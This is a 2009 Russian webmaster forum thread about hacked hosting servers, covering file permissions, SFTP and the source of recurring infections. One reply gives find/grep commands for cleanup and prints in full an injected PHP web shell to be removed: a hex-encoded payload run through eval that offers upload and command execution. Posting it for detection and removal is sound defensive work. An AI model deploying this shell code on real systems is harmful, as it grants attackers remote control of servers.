С нами с 07.07.08
Сообщения: 142
Рейтинг: -7
|
 Добавлено: 22/04/09 в 02:14 |
всем спс
color:
сорри, ася не работала, не знал, что вы отписали... просто он вернулся, потому забил тревогу )
|
|
|
|
| |
С нами с 21.09.03
Сообщения: 7329
Рейтинг: 2144
|
| Добавлено: 22/04/09 в 04:45 |
| color писал: | | многие скрипты требуют права на запись на файлы которые они генерят и которые потом инклудятся. |
Это дырявые скрипты. Это вопросы к программерам таких скриптов. Из-за них куча проблем возникает, и иногда потери гораздо больше, чем приобретения от таких скриптов.
|
|
|
|
| |
С нами с 10.10.07
Сообщения: 339
Рейтинг: 404
|
| Добавлено: 22/04/09 в 05:59 |
не факт что права 777 на директорию гарантируют взлом сервера, точно так же как и права 755 (644) - не гарантируют безопасность.
Я думаю что ни для кого не секрет что большинство вменяемых администраторов запускают юзерские апачи,нгинксы (веб-сервисы) в чруте или со сменой юзера через suexec/suphp, или запуском фцги-менеджера от юзера.
поэтому в ЛЮБОМ случае скрипт будет иметь право на запись в СВОИ директории.
поэтому только правами НИКОГДА нельзя защитить сервер, это помоему очевидно.
если админ говорит что не через фтп/ссх сломали (99.999% что он прав), дырка в скриптах, установленных блогах, линк-ексченджах и т.д.
|
|
|
|
| |
old.flysays.com
С нами с 03.09.03
Сообщения: 1510
Рейтинг: 1284
|
| Добавлено: 22/04/09 в 17:27 |
мне тоже кое-что поломали.
там где было жестко 444. все заебись.
где 666 - вставлен код. (в основном в .tpl файлы)
пустые индексные файлы тоже присутствуют
|
|
|
|
| |
+ +
www.b52hosting.com Хостинг
С нами с 10.01.08
Сообщения: 4931
Рейтинг: 147
|
| Добавлено: 22/04/09 в 23:43 |
| Zizi писал: |
а зависит ли уязвимость/безопасность сервака от его стоимости?
подскажите альтернативу FTP... |
1. Нет
2. sftp, ftps, ssh. А можно еще VPN на сервер поставить и через него пускать FTP.
|
|
|
|
| |
+ +
www.b52hosting.com Хостинг
С нами с 10.01.08
Сообщения: 4931
Рейтинг: 147
|
| Добавлено: 22/04/09 в 23:57 |
| Soft-Com писал: | не факт что права 777 на директорию гарантируют взлом сервера, точно так же как и права 755 (644) - не гарантируют безопасность.
Я думаю что ни для кого не секрет что большинство вменяемых администраторов запускают юзерские апачи,нгинксы (веб-сервисы) в чруте или со сменой юзера через suexec/suphp, или запуском фцги-менеджера от юзера.
поэтому в ЛЮБОМ случае скрипт будет иметь право на запись в СВОИ директории.
поэтому только правами НИКОГДА нельзя защитить сервер, это помоему очевидно.
если админ говорит что не через фтп/ссх сломали (99.999% что он прав), дырка в скриптах, установленных блогах, линк-ексченджах и т.д. |
Ну все же похоже на то, что "большинство вменяемых администраторов" это не более 70% от администраторов. Поэтому вебшелы так и процветают.
|
|
|
|
| |
XXX-Server.biz
С нами с 15.02.03
Сообщения: 9411
Рейтинг: 6676
|
| Добавлено: 23/04/09 в 01:01 |
Вебшеллы процветают от кривых скриптов
|
|
|
|
| |
XXX-Server.biz
С нами с 15.02.03
Сообщения: 9411
Рейтинг: 6676
|
| Добавлено: 23/04/09 в 01:03 |
| dlk44 писал: |
2. sftp, ftps, ssh. |
да можно хоть все сервисы кроме http отключить, только от проблемы топикстартера это не спасет
| Цитата: |
А можно еще VPN на сервер поставить и через него пускать FTP. |
это еще зачем такой изврат?
|
|
|
|
| |
С нами с 10.10.07
Сообщения: 339
Рейтинг: 404
|
| Добавлено: 23/04/09 в 09:02 |
Разговор зашёл уже далеко от темы ТС.
Если не доверяешь админу, закажи у нормальной команды аудит сервера, тебе и админу нормально распишут где он (или ты) ошиблись и скажут что и как делать.
Если с админом работаешь давно и нормально, то лучше всего просто выполнять все его требования - чем меньше проблем ты создаёшь для админа, тем больше вероятность того что он будет дырки своевременно искать, тем более если админ один, а не пара-тройка.
|
|
|
|
| |
С нами с 13.05.08
Сообщения: 23
Рейтинг: 16
|
| Добавлено: 23/04/09 в 11:07 |
народ, кто-то понял как от этого избавиться? Вирусы удаляем. а они периодически заново появляются. затрахали уже.
Soft-Com: ты прав насчет прав, у меня именно такая ситуация, вирусы пихаются везде где апач имеет право на запись.
|
|
|
|
| |
С нами с 10.10.07
Сообщения: 339
Рейтинг: 404
|
| Добавлено: 23/04/09 в 11:10 |
Если есть желание, стукнись плс в аську (в профиле), разберёмся с твоим сервером.
|
|
|
|
| |
old.flysays.com
С нами с 03.09.03
Сообщения: 1510
Рейтинг: 1284
|
| Добавлено: 23/04/09 в 13:21 |
Так источник взлома нашли?
Со следствием уже расквитался (и предупредил от дальнейших изменений файлов путем замены прав на 444), но причина пока до сих пор не найдена 
|
|
|
|
| |
С нами с 13.05.08
Сообщения: 23
Рейтинг: 16
|
| Добавлено: 23/04/09 в 14:08 |
пока не нашли причину, ищем.
|
|
|
|
| |
С нами с 13.05.08
Сообщения: 23
Рейтинг: 16
|
| Добавлено: 24/04/09 в 13:14 |
Soft-Com: нашел источник заражения, теперь все ок, кто столкнулся с такой проблемой - обращайтесь к нему.
|
|
|
|
| |
С нами с 22.01.04
Сообщения: 1037
Рейтинг: 694
|
| Добавлено: 24/04/09 в 13:34 |
А тем кто не столкнулся рассказать?
Знать бы тоже хотелось.
|
|
|
|
| |
С нами с 13.05.08
Сообщения: 23
Рейтинг: 16
|
| Добавлено: 24/04/09 в 13:37 |
к сожалению я не админ, разъяснить не могу, но у меня сервере лежал скрипт, который генерел эксплоиты и пихал куда тольео мог регулярно. Сначала мы только удаляли уже результат, но потом Soft-Com: нашел сам источник- этот скрипт. Как скрипт попал на сервер- неясно.
|
|
|
|
| |
С нами с 10.10.07
Сообщения: 339
Рейтинг: 404
|
| Добавлено: 24/04/09 в 13:54 |
Спасибо Grebezen за предоставленную площадку  .
для того чтобы найти скрипты с php-инъекцией можно попробовать так:
| Код: |
find / -name \*.php -exec grep -EH "202069662028245F504F53545B706" {} \; | awk -F":" '{print $1}'
|
найденные файлы нужно проверить, убедиться что они нах не нужны и удалить. Может получиться так, что инъекция в нужном файлике, тогда надо удалить кусок кода
| Код: |
<?php $s="202069662028245F504F53545B706173735D213D273132332729207B206563686F2027203C68746D6C3E3C626F6479206267636F6C6F723D23424246464242206F6E6C6F61643
D22646F63756D656E742E6D79662E706173732E666F63757328293B223E3C666F726D206D6574686F643D504F53543E3C696E707574206E616D653D706173733E3C2F666F726D3E3C2F626F
64793E20203C2F68746D6C3E273B206578697428293B207D6563686F20273C68746D6C3E3C626F6479206267636F6C6F723D23424246464242206F6E6C6F61643D22646F63756D656E742E6
D79662E63632E666F63757328293B223E273B6563686F20273C666F726D206E616D653D6D7966206D6574686F643D504F535420656E63747970653D226D756C7469706172742F666F726D2D
64617461223E3C696E70757420747970653D68696464656E206E616D653D706173732076616C75653D272E245F504F53545B706173735D2E273E3C696E70757420747970653D66696C65206
E616D653D757066696C653E3C696E707574206E616D653D6E65776E616D653E3C696E70757420747970653D7375626D69743E3C62723E273B6563686F20273C696E707574206E616D653D63
632073697A653D37332076616C75653D22272E7374726970736C617368657328245F504F53545B63635D292E27223E3C2F666F726D3E273B6563686F20273C7072653E273B20696620286D6
F76655F75706C6F616465645F66696C6528245F46494C45535B27757066696C65275D5B27746D705F6E616D65275D2C20245F504F53545B6E65776E616D655D2929207B202F2A6563686F20
2253656E742E3C62723E5C6E223B2A2F207D69662028245F504F53545B6D66696C655D29207B2020202466703D666F70656E28245F504F53545B6E65776E616D655D2C277727293B2020206
66F7228246B3D303B20246B3C7374726C656E28245F504F53545B6D66696C655D293B20246B2B3D322920207B20202020246363203D2073756273747228245F504F53545B6D66696C655D2C
246B2C32293B20202020246363203D20273078272E2463633B2020202020202020246363203D20726F756E6428246363293B20202020246363203D2063687228246363293B2020202066777
2697465282466702C246363293B2020207D202066636C6F736528246670293B207D24636F3D7374726970736C617368657328245F504F53545B63635D293B206563686F206024636F603B20
6563686F20273C2F7072653E273B6563686F20273C2F626F64793E3C2F68746D6C3E273B20";$sss="";for($k=0;$k<strlen($s);$k+=2){$ss=chr(("0x".substr($s,$k,2))+0);$ss
s.=$ss;}eval($sss);$ssss="**********************************";?>
|
затем нужно вычистить инфицированные трояном хтмльки
| Код: |
for i in php html htm tpl inc; do find / -name \*.$i -exec grep -H "wlxfnvmg.ylwb.zkkvm" {} \; | awk -F":" '{print $1}'; done
|
P.S.
шаблоны, по которым ведётся поиск МОГУТ отличаться, потому что тот кто его закинул очевидно не дебил, и используются разные названия функций и т.д. Алгоритм, который я тут привёл скорее подсказка для ваших админов, а по хорошему нужно генерить пару раз hex-код трояна в хтмльках, для того чтобы найти материнский скрипт, который и генерит скрипты с php-инъекцией, к которым потом идёт запрос через веб, и которые рассаживают троянов в хтмльки.
и всё вышеизложенное не гарантирует защиту от взлома в будущем - тут надо именно сервер смотреть и проверять на безопасность.
P.P.S.
буду рад помочь желающим за некоторые материальные блага .
|
|
|
|
| |
